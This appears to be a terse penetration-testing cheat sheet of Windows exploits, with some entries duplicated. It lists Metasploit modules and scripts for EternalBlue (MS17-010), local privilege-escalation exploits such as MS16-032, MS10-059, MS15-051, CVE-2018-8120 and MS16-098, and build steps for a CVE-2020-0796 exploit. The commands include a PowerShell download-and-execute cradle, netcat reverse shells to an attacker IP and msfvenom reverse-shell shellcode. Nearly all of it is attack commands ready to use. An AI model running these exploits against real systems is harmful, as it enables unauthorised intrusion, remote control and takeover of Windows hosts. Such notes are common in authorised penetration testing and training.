windows exploits
Last updated
Was this helpful?
Last updated
Was this helpful?
msf:
checker: use auxiliary/scanner/smb/smb_ms17_010
exploit: use exploit/windows/sbm/ms17_010_eternalblue
no pipes needed | manual method
update username as guest / anonymous (if needed)
python send_and_execute.py TARGET_IP SHELL.exe
ensure to run pre requisites
python zzz_exploit.py TARGET_IP
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('shell.ps1')"
MS11-046 | CVE-2011-1249 | win7 6.1.7600 N/A Build 7600 x86
MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
MS10-059.exe KALI_IP PORT
msf: use windows/browser/ms09_002_memory_corruption
CVE-2018-8120
Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode
CVE-2018-8120
Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode
CVE-2018-8120
Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode
MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
MS10-059.exe KALI_IP PORT
MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
MS10-059.exe KALI_IP PORT
MS16-098 | CVE-2016-3309 | Server 2012 R2 Standard 6.3.9600 N/A Build 9600
MS15-05
ms15-051.exe "nc64.exe -c cmd.exe IP PORT"
MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
MS10-059.exe KALI_IP PORT
Local PE using Windows Services (upnphost and SSDPSRV)
REQUIREMENTS:
needs smb port:445 open
Generate shellcode using msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f dll -f csharp
Update shellcode on line 204 file: exploit.cpp
Set TARGET_ARCH and set for RELEASE
Build solution
Run cve-2020-0796-local.exe